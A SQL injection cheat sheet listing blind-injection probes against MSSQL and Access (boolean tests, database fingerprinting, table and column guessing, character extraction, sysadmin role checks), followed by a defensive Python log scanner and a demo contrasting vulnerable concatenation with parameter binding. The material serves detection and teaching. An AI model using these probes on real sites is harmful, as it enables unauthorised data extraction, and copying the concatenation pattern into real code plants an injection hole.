1. Check whether the parameter is injectable: ;and 1=1 and ;and 1=2
2. First check whether the backend is MSSQL: ;and user>0
3. If the injected parameter is a string: 'and [condition] and ''='
4. In a search form whose parameter is not filtered: 'and [condition] and '%25'='
5. Identify the database system
   ;and (select count(*) from sysobjects)>0    mssql
   ;and (select count(*) from msysobjects)>0   access
6. Guess the database (in the query this is actually the table name): ;and (select Count(*) from [table name])>0
7. Guess a column: ;and (select Count([column name]) from [table name])>0
8. Guess the length of a value in that column: ;and (select top 1 len([column name]) from [table name])>0
9. (1) Guess the ASCII value of a character in the column (Access)
   ;and (select top 1 asc(mid([column name],1,1)) from [table name])>0
   (2) Guess the ASCII value of a character in the column (MSSQL)
   ;and (select top 1 unicode(substring([column name],1,1)) from [table name])>0
10. Test the privilege structure (MSSQL)
   ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
   ;and 1=(select IS_MEMBER('db_owner'));--
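Every step in this sheet depends on the same two things: the probe text is pasted into the SQL statement, and the page answers differently for a true and a false condition. The Python below is an added example, not part of the cheat sheet: it matches the probe shapes listed above against a few constructed access-log lines (the regexes and the log lines are my own, written to the payloads on this page), and then shows on an in-memory SQLite table (a stand-in for the MSSQL/Access targets the sheet assumes) why the and 1=1 / and 1=2 differential vanishes once the parameter is bound instead of concatenated.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Signatures written against the probe payloads listed in the cheat sheet.
# They are matched against the URL-decoded request path, case-insensitively.
PROBE_SIGNATURES = [
    (r"\band\s+1\s*=\s*[12]\b", "boolean probe (and 1=1 / and 1=2)"),
    (r"\band\s+user\s*>\s*0\b", "MSSQL user>0 type-conversion probe"),
    (r"\bfrom\s+m?sysobjects\b", "DBMS fingerprint via sysobjects/msysobjects"),
    (r"\bselect\s+top\s+1\s+(?:len|asc|unicode)\s*\(", "blind length/character extraction"),
    (r"\bis_(?:srvrolemember|member)\s*\(", "server/database role probe"),
    (r"\band\s+'%?'\s*=\s*'", "quote-closing tail (and ''=' / and '%'=')"),
]
COMPILED = [(re.compile(p, re.IGNORECASE), label) for p, label in PROBE_SIGNATURES]

# Constructed request lines (not real traffic); the first one is benign.
SAMPLE_REQUESTS = [
    "GET /news.asp?id=12 HTTP/1.1",
    "GET /news.asp?id=12+and+1%3D1 HTTP/1.1",
    "GET /news.asp?id=12%20and%20user%3E0 HTTP/1.1",
    "GET /news.asp?id=12;and%20(select%20count(*)%20from%20sysobjects)%3E0 HTTP/1.1",
    "GET /search.asp?key=test'%20and%201=1%20and%20'%25'=' HTTP/1.1",
    "GET /news.asp?id=12;and%201=(select%20IS_SRVROLEMEMBER('sysadmin'));-- HTTP/1.1",
]


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double encoding (e.g. %2527) does not hide a quote."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(path):
    """Return the labels of every signature that fires on one request path."""
    text = decode_fully(path)
    return [label for rx, label in COMPILED if rx.search(text)]


def scan_log(lines):
    """Scan 'METHOD PATH HTTP/x' lines; map each flagged path to its labels."""
    findings = {}
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        labels = classify(parts[1])
        if labels:
            findings[parts[1]] = labels
    return findings


def build_demo_db():
    """In-memory SQLite stand-in for the MSSQL/Access backends the sheet targets."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO news VALUES (12, 'hello')")
    return conn


def fetch_concat(conn, raw_id):
    """Vulnerable pattern: the parameter text becomes part of the statement,
    so 'and 1=1' keeps the row and 'and 1=2' drops it (the sheet's step 1)."""
    return conn.execute("SELECT title FROM news WHERE id = " + raw_id).fetchall()


def fetch_param(conn, raw_id):
    """Hardened pattern: the parameter is bound as a value and never parsed as SQL,
    so the probe text is just a string that matches no id."""
    return conn.execute("SELECT title FROM news WHERE id = ?", (raw_id,)).fetchall()


if __name__ == "__main__":
    for path, labels in scan_log(SAMPLE_REQUESTS).items():
        print(path, "->", labels)
    db = build_demo_db()
    print("concat  12 and 1=1 :", fetch_concat(db, "12 and 1=1"))
    print("concat  12 and 1=2 :", fetch_concat(db, "12 and 1=2"))
    print("param   12 and 1=1 :", fetch_param(db, "12 and 1=1"))
```

The signatures are deliberately narrow (they key on the exact shapes on this page) so they produce few false positives on ordinary traffic; a production rule set would pair them with request-rate and response-size anomalies, since blind extraction as in steps 8 and 9 shows up as hundreds of near-identical requests differing only in one numeric comparison.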